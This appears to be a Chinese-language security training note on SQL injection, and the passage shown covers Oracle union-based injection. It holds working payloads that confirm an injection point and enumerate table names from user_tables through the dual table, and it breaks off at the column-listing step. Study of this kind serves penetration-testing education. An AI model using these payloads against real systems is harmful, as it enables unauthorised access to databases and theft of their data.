小迪安全26WEB 攻防-通用漏洞&SQL 注入 &Sqlmap&Oracle&Mongodb&DB2 等

 

#知识点： 

1、数据库注入-Oracle&Mongodb 

2、数据库注入-DB2&SQLite&Sybase 

3、SQL 注入神器-SQLMAP 安装使用拓展

 

 

 

数据库注入：

数据库注入-联合猜解-Oracle&Mongodb 

  1.Oracle数据库一般会在java上执行

参考:https://www.cnblogs.com/peterpan0707007/p/8242119.html 

 

猜回显位：用的是单引号，进行猜测，因为在数据库中加入单引号是一种字符类型的，通过SQL语句，判断之后的数据是否能正常的显示页面，从而进行判断注入点。

Dual：是一个虚表。只有一列，必须使用关键字语句才可以进行使用，通常是 查询时间等数据。

 

测回显：and 1=2 union select '1','2' from dual 

 

爆库：and 1=2 union select '1',(select table_name from user_tables 

where rownum=1) from dual 

 

模糊爆库：and 1=2 union select '1',(select table_name from 

user_tables where rownum=1 and table_name like '%user%') from 

dual 

 

爆列名：and 1=2